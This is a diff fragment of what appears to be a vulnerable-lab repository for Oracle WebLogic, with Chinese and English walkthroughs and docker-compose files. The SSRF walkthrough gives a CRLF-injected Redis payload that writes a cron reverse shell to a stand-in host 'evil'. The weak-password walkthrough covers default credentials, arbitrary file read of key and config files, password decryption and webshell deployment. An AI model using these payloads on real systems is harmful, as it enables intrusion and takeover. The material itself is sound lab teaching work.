+User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
+Connection: close
+
+```
+
+当访问一个可用端口时，会收到一个带有状态码的错误响应。如果访问的是非HTTP协议，则会返回"did not have a valid SOAP content-type"错误。
+
+![](1.png)
+
+当访问一个不存在的端口时，响应会显示"could not connect over HTTP to server"。
+
+![](2.png)
+
+通过分析这些不同的错误信息，我们可以有效地探测内网状态。
+
+### Redis反弹Shell利用
+
+WebLogic的SSRF漏洞有一个显著特点：尽管是GET请求，我们可以通过传入`%0a%0d`来注入换行符。由于Redis等服务使用换行符来分隔命令，我们可以利用这一特性来攻击内网中的Redis服务器。
+
+首先，我们扫描内网中的Redis服务器（Docker网络通常使用172.*网段），发现`172.18.0.2:6379`可以访问：
+
+![](3.png)
+
+然后，我们可以发送三条Redis命令，将shell脚本写入`/etc/crontab`：
+
+```
+set 1 "\n\n\n\n0-59 0-23 1-31 1-12 0-6 root bash -c 'sh -i >& /dev/tcp/evil/21 0>&1'\n\n\n\n"
+config set dir /etc/
+config set dbfilename crontab
+save
+```
+
+对这些命令进行URL编码：
+
+```
+set%201%20%22%5Cn%5Cn%5Cn%5Cn0-59%200-23%201-31%201-12%200-6%20root%20bash%20-c%20%27sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2Fevil%2F21%200%3E%261%27%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave
+```
+
+通过SSRF漏洞发送编码后的payload：
+
+```
+GET /uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://172.19.0.2:6379/test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn0-59%200-23%201-31%201-12%200-6%20root%20bash%20-c%20%27sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2Fevil%2F21%200%3E%261%27%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aaaa HTTP/1.1
+Host: localhost
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
+Connection: close
+
+```
+
+![](4.png)
+
+成功获得反弹shell：
+
+![](5.png)
+
+需要注意的是，可以利用的cron位置有以下几处：
+
+- `/etc/crontab`（系统默认定时任务文件）
+- `/etc/cron.d/*`（系统定时任务目录）
+- `/var/spool/cron/root`（CentOS系统下root用户的定时任务文件）
+- `/var/spool/cron/crontabs/root`（Debian系统下root用户的定时任务文件）

weblogic/ssrf/docker-compose.yml

@@ -0,0 +1,9 @@
+services:
+ weblogic:
+   image: vulhub/weblogic:10.3.6.0-2017
+   depends_on:
+    - redis
+   ports:
+    - "7001:7001"
+ redis:
+   image: vulhub/baselinux:centos-6

weblogic/weak_password/README.md

@@ -0,0 +1,86 @@
+# WebLogic Weak Password, Arbitrary File Read and Remote Code Execution
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Oracle WebLogic Server is a Java-based enterprise application server.
+
+This environment simulates a realistic WebLogic setup with two vulnerabilities: a weak password in the admin console and an arbitrary file read vulnerability in the frontend. These vulnerabilities demonstrate common penetration testing scenarios for WebLogic servers.
+
+## Environment Setup
+
+Execute the following command to start the WebLogic server, this server based on WebLogic 10.3.6 (11g) and Java 1.6.
+
+```
+docker compose up -d
+```
+
+After the environment starts, visit `http://your-ip:7001/console` to access the WebLogic admin console.
+
+## Vulnerability Exploitation
+
+The environment contains the following default credentials:
+
+- Username: weblogic
+- Password: Oracle@123
+
+For a comprehensive list of common WebLogic default credentials, visit: <http://cirt.net/passwords?criteria=weblogic>
+
+If weak credentials are not available, how can we penetrate the WebLogic server? This environment simulates an arbitrary file download vulnerability. Visit `http://your-ip:7001/hello/file.jsp?path=/etc/passwd` to verify that we can successfully read the passwd file.
+
+To leverage this vulnerability effectively, we can extract the admin password by following these steps:
+
+### Reading Backend User Password Hash and Key Files
+
+WebLogic passwords are encrypted using AES (older versions used 3DES). Since this is symmetric encryption, we can decrypt the password if we obtain both the ciphertext and the encryption key. These files are located in the base_domain directory:
+
+- `SerializedSystemIni.dat`: The encryption key file
+- `config.xml`: The configuration file containing encrypted passwords
+
+In this environment, these files are located at:
+
+- `./security/SerializedSystemIni.dat`
+- `./config/config.xml`
+
+(relative to `/root/Oracle/Middleware/user_projects/domains/base_domain`)
+
+When downloading `SerializedSystemIni.dat`, use Burp Suite as it's a binary file. Browser downloads might introduce unwanted characters. In Burp Suite, select the binary content and use "Copy to File" to save it correctly:
+
+![](img/05.png)
+
+In `config.xml`, locate the `<node-manager-password-encrypted>` value, which contains the encrypted administrator password:
+
+![](img/06.png)
+
+### Decrypting the Password
+
+Use the `weblogic_decrypt.jar` tool (provided in the decrypt directory) to decrypt the password. For more details on building your own decryption tool, refer to: <http://cb.drops.wiki/drops/tips-349.html>
+
+![](img/07.png)
+
+The decrypted password matches our preset password, confirming successful exploitation.
+
+### Deploying a WebShell
+
+After obtaining administrator credentials, log into the admin console. Click "Deployments" in the left navigation panel to view the application list:
+
+![](img/01.png)
+
+Click "Install" and select "Upload your files":
+
+![](img/02.png)
+
+Upload a WAR package. Note that standard Tomcat WAR files might not work properly. You can use the `web/hello.war` package from this project as a template. After uploading, click "Next".
+
+Enter the application name:
+
+![](img/03.png)
+
+Continue through the remaining steps and click "Finish".
+
+The application path is specified in `WEB-INF/weblogic.xml` within the WAR package. Since this test environment already uses the `/hello` path, modify this path (e.g., to `/jspspy`) when deploying your shell:
+
+![](img/08.png)
+
+Successfully accessing the webshell:
+
+![](img/04.png)

weblogic/weak_password/README.zh-cn.md

@@ -0,0 +1,86 @@
+# WebLogic 弱口令、任意文件读取与远程代码执行
+
+Oracle WebLogic Server是一个基于Java的企业级应用服务器。
+
+本环境模拟了一个真实的WebLogic环境，包含两个漏洞：后台管理控制台存在弱口令，以及前台存在任意文件读取漏洞。通过这两个漏洞，我们可以演示对WebLogic服务器的常见渗透测试场景。
+
+## 环境搭建
+
+执行如下命令启动WebLogic服务器，该服务器基于WebLogic 10.3.6（11g）和Java 1.6。
+
+```
+docker compose up -d
+```
+
+环境启动后，访问`http://your-ip:7001/console`进入WebLogic管理控制台。
+
+## 漏洞复现
+
+环境中存在以下默认凭据：
+
+- 用户名：weblogic
+- 密码：Oracle@123
+
+更多WebLogic常用默认凭据可参考：<http://cirt.net/passwords?criteria=weblogic>
+
+### 任意文件读取漏洞利用
+
+如果没有弱口令可以利用，我们如何渗透WebLogic服务器？本环境模拟了一个任意文件下载漏洞。访问`http://your-ip:7001/hello/file.jsp?path=/etc/passwd`可以验证成功读取passwd文件。
+
+要有效利用这个漏洞，我们可以通过以下步骤提取管理员密码：
+
+### 读取后台用户密文与密钥文件
+
+WebLogic的密码使用AES加密（老版本使用3DES）。由于这是对称加密，如果我们能获得密文和加密密钥，就可以解密密码。这两个文件位于base_domain目录下：
+
+- `SerializedSystemIni.dat`：加密密钥文件
+- `config.xml`：包含加密密码的配置文件
+
+在本环境中，这些文件位于：
+
+- `./security/SerializedSystemIni.dat`
+- `./config/config.xml`
+
+（相对于`/root/Oracle/Middleware/user_projects/domains/base_domain`目录）
+
+下载`SerializedSystemIni.dat`时，必须使用Burp Suite，因为这是二进制文件。直接用浏览器下载可能会引入干扰字符。在Burp Suite中，选中二进制内容并使用"Copy to File"功能正确保存：
+
+![](img/05.png)
+
+在`config.xml`中，找到`<node-manager-password-encrypted>`值，这里包含了加密后的管理员密码：
+
+![](img/06.png)
+
+### 解密密文
+
+使用环境中decrypt目录下的`weblogic_decrypt.jar`工具解密密文。如需了解如何构建自己的解密工具，可参考：<http://cb.drops.wiki/drops/tips-349.html>
+
+![](img/07.png)
+
+解密后的密码与预设密码一致，证明利用成功。
+
+### 部署WebShell
+
+获取管理员凭据后，登录管理控制台。点击左侧导航栏中的"部署"查看应用列表：
+
+![](img/01.png)
+
+点击"安装"并选择"上传文件"：
+
+![](img/02.png)
+
+上传WAR包。注意，标准的Tomcat WAR文件可能无法正常工作。你可以使用本项目中的`web/hello.war`包作为模板。上传后点击"下一步"。
+
+输入应用名称：
+
+![](img/03.png)
+
+继续完成剩余步骤，最后点击"完成"。
+
+应用路径在WAR包中的`WEB-INF/weblogic.xml`文件中指定。由于测试环境已经使用了`/hello`路径，部署shell时需要修改这个路径（例如改为`/jspspy`）：
+
+![](img/08.png)
+
+成功访问webshell：
+
+![](img/04.png)

weblogic/weak_password/docker-compose.yml

@@ -0,0 +1,8 @@
+services:
+ weblogic:
+   image: vulhub/weblogic:10.3.6.0-2017
+   volumes:
+    - ./web:/root/Oracle/Middleware/user_projects/domains/base_domain/autodeploy
+   ports:
+    - "7001:7001"
+    - "5556:5556"